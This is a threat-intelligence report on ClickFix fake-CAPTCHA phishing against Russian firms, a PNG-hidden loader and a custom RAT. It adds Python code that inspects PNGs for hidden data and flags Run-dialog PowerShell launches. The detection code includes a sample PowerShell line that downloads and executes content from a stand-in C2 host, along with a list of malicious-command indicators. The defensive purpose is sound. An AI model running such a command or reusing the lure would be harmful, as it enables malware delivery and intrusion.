Fake CAPTCHAs used in new attacks on Russian companies

Close to 30 Russian companies were attacked in May and early June. The attacks used the ClickFix technique, which tricks users into running malicious scripts themselves. Previously, such attacks had only been recorded outside Russia.
June 26, 2025

In May 2025, BI.ZONE Threat Intelligence detected at least two campaigns employing the ClickFix technique against Russian organizations. Under the guise of law enforcement agencies, the threat actors would send a PDF document to their victims.

The text inside was blurred, making it impossible to read. To access the file, the victim was asked to confirm they were human. In reality, clicking the button redirected them to the attackers’ website, which again displayed a window with a fake CAPTCHA. By clicking “I’m not a robot,” the victim unknowingly copied a PowerShell script to the clipboard.

The victim was then asked to perform a series of keystrokes on their device, purportedly to confirm access permissions to the document so it would open correctly. Instead, these keystrokes ran the malicious code copied when the CAPTCHA was clicked: Win + R opened the Run dialog, Ctrl + V pasted the script from the clipboard into it, and Enter launched it.

The ClickFix technique is named so because the attackers ask a victim to perform a series of simple actions to fix a technical issue. Essentially, the victim is tricked into executing a malicious command.
Adversaries have employed ClickFix since spring 2024, but this is the first recorded use against companies in Russia and other CIS countries. Criminals continue to experiment with social engineering techniques, using new scripts that are still unfamiliar to users and, thus, are harder to recognize.
Oleg Skulkin
Head of BI.ZONE Threat Intelligence

The script launched by the victim downloaded a PNG image from the C2 server and extracted from it malware called Octowave Loader.

Octowave Loader consisted of several components, including a few malicious files hidden among a heap of legitimate ones. One of them concealed embedded executable code that subsequently launched another piece of malware on the victim’s device: a remote access trojan (RAT) that no researcher had classified or described before. It was most likely developed by the adversaries themselves.

The detected RAT first exfiltrated basic information about the compromised system (username, permissions, OS version, etc.), after which the criminals could execute commands and launch processes on the victim’s device. Such a long attack chain, with its use of steganography, aims to evade cybersecurity defenses and increase the chances of a successful compromise.

The PNG file that carried the malicious code was a meme with political content. However, the victim never saw the image, because the file was downloaded discreetly and was not opened for viewing.
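The write-up says the script fetched a PNG and extracted Octowave Loader from it, but does not say how the payload was embedded. The following added check (not BI.ZONE’s code, and not a description of the Octowave sample) parses the PNG chunk structure and reports two common carrier patterns a viewer would never render: bytes appended after the IEND chunk, and chunks that are non-standard or implausibly large. The sample images are constructed inline; the 4096-byte ancillary threshold is an assumption you would tune to your environment.

```python
"""Check a PNG file for data that an image viewer would never render.

Added example; not BI.ZONE's code and not a description of how the
Octowave sample hid its payload. It parses the PNG chunk structure and
reports two common carrier patterns: bytes appended after the IEND
chunk, and chunks that are non-standard or implausibly large. Pixel-level
(LSB) steganography is not covered; that needs statistical analysis.
"""
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG specification (critical and ancillary).
STANDARD_CHUNKS = {
    "IHDR", "PLTE", "IDAT", "IEND", "tRNS", "cHRM", "gAMA", "iCCP", "sBIT",
    "sRGB", "tEXt", "zTXt", "iTXt", "bKGD", "hIST", "pHYs", "sPLT", "tIME",
}


def _chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialize one chunk: length, type, data, CRC over type+data."""
    return (struct.pack(">I", len(data)) + ctype + data
            + struct.pack(">I", zlib.crc32(ctype + data)))


def build_png(width=2, height=2, extra_chunks=(), trailer=b"") -> bytes:
    """Build a minimal valid RGB PNG (constructed test data), optionally
    with extra chunks before IDAT and/or bytes appended after IEND."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    # One filter byte (0 = None) followed by width RGB pixels per scanline.
    raw = b"".join(b"\x00" + b"\x00\x00\x00" * width for _ in range(height))
    png = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for ctype, data in extra_chunks:
        png += _chunk(ctype, data)
    png += _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b"")
    return png + trailer


def inspect_png(data: bytes, max_ancillary=4096) -> list:
    """Return a list of findings; an empty list means nothing stood out."""
    findings = []
    if not data.startswith(PNG_SIGNATURE):
        return ["not a PNG file"]
    pos = len(PNG_SIGNATURE)
    saw_iend = False
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        name = ctype.decode("latin-1")
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) < length or len(crc) < 4:
            findings.append(f"truncated chunk {name}")
            return findings
        if struct.unpack(">I", crc)[0] != zlib.crc32(ctype + body):
            findings.append(f"bad CRC in chunk {name}")
        if name not in STANDARD_CHUNKS:
            findings.append(f"non-standard chunk {name} ({length} bytes)")
        elif name not in ("IDAT", "PLTE") and length > max_ancillary:
            findings.append(f"oversized {name} chunk ({length} bytes)")
        pos += 12 + length
        if name == "IEND":
            saw_iend = True
            break
    if not saw_iend:
        findings.append("no IEND chunk")
    trailing = len(data) - pos
    if trailing > 0:
        findings.append(f"{trailing} bytes after IEND")
    return findings


if __name__ == "__main__":
    import sys
    with open(sys.argv[1], "rb") as fh:
        for finding in inspect_png(fh.read()) or ["clean"]:
            print(finding)
```

A file that trips this check is not proof of malice (some tools append metadata after IEND), but an image that a script downloads without ever displaying and that carries kilobytes of unrenderable data is exactly the combination worth pulling for analysis.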

The use of a custom RAT likely indicates that the adversaries’ goal was espionage. Furthermore, the phishing emails were disguised as messages from law enforcement agencies, a signature most characteristic of espionage clusters.

In both campaigns, the attacks started with phishing emails. Dedicated services such as BI.ZONE Mail Security can filter out unwanted messages and protect your email communications, while endpoint detection and response solutions, such as BI.ZONE EDR, can help you track suspicious activity, including PowerShell executions. These measures allow you to mitigate risks through early threat detection and automated or manual response.
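The write-up describes the Win + R, Ctrl + V, Enter chain and recommends tracking PowerShell executions in EDR telemetry. The following added example (not BI.ZONE’s code and not a BI.ZONE EDR rule) shows what such a detection can key on: a command typed into the Run dialog is spawned with explorer.exe as its parent, so a PowerShell child of explorer.exe whose command line hides its window, decodes a blob or fetches content from the network is the shape to alert on. It assumes Sysmon-style Event ID 1 fields (ParentImage, Image, CommandLine) and uses constructed sample events; the RunMRU registry check is a forensic cross-check for hosts without process telemetry. The indicator list and the c2.invalid host are illustrative assumptions.

```python
"""Flag ClickFix-style launches in process-creation telemetry.

Added example; not part of the BI.ZONE write-up and not their tooling.
A command typed into the Win+R Run dialog is spawned with explorer.exe
as its parent, so a PowerShell (or cmd/mshta) child of explorer.exe whose
command line hides its window, decodes a blob or fetches content from
the network is the shape an EDR rule for this technique looks for.
"""
import re

# Command-line indicators; a Run-dialog shell needs at least one to be flagged.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download": re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Net\.WebClient|\bcurl\b", re.I),
    "invoke_expression": re.compile(r"\biex\b|Invoke-Expression", re.I),
    "policy_bypass": re.compile(r"-e(?:xecution)?p(?:olicy)?\s+bypass", re.I),
}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: dict) -> list:
    """Return why an event trips the rule; an empty list means it does not."""
    if _basename(event["Image"]) not in SHELLS:
        return []
    if _basename(event["ParentImage"]) != "explorer.exe":
        return []  # not the Run-dialog launch pattern this rule covers
    hits = [name for name, pat in INDICATORS.items() if pat.search(event["CommandLine"])]
    return ["shell spawned by explorer.exe"] + hits if hits else []


def find_clickfix_candidates(events) -> dict:
    """Map ProcessId -> reasons for every event that trips the rule."""
    return {e["ProcessId"]: r for e in events if (r := analyze_event(e))}


def suspicious_runmru(values: dict) -> list:
    """Forensic cross-check: the Run dialog records its history under
    HKCU\\...\\Explorer\\RunMRU, each value being the command plus a "\\1"
    suffix. Returns (value name, command) for entries matching the rule."""
    names = SHELLS | {"powershell", "pwsh", "cmd", "mshta"}
    found = []
    for name, raw in values.items():
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        parts = cmd.split()
        if parts and _basename(parts[0]) in names \
                and any(p.search(cmd) for p in INDICATORS.values()):
            found.append((name, cmd))
    return found


# Constructed Sysmon Event ID 1 style records (not real telemetry).
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://c2.invalid/pic.png)"'},
    {"ProcessId": 4133, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile"},  # user opened a console: benign
    {"ProcessId": 2208, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},  # scheduled task: outside this rule
    {"ProcessId": 5001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad.exe"},
]
SAMPLE_RUNMRU = {  # constructed RunMRU values
    "a": 'powershell -w hidden -c "iex (iwr http://c2.invalid/pic.png)"\\1',
    "b": "notepad\\1",
    "MRUList": "ab",
}

if __name__ == "__main__":
    for pid, reasons in find_clickfix_candidates(SAMPLE_EVENTS).items():
        print(pid, ", ".join(reasons))
    for name, cmd in suspicious_runmru(SAMPLE_RUNMRU):
        print(f"RunMRU {name}: {cmd}")
```

The rule deliberately ignores PowerShell started by services.exe or a scheduled task, which is the business of other rules; its value is the narrow combination of an interactive shell launch from the Explorer shell with a command line that no user would type by hand. The second sample event, a console opened from the Run dialog with no indicators, shows the false positive it is built to avoid.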

Threat actors are constantly innovating their approaches and their arsenal to carry out attacks. Data from portals like BI.ZONE Threat Intelligence can help you keep track of attacks and build an effective cybersecurity strategy. This information ensures the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.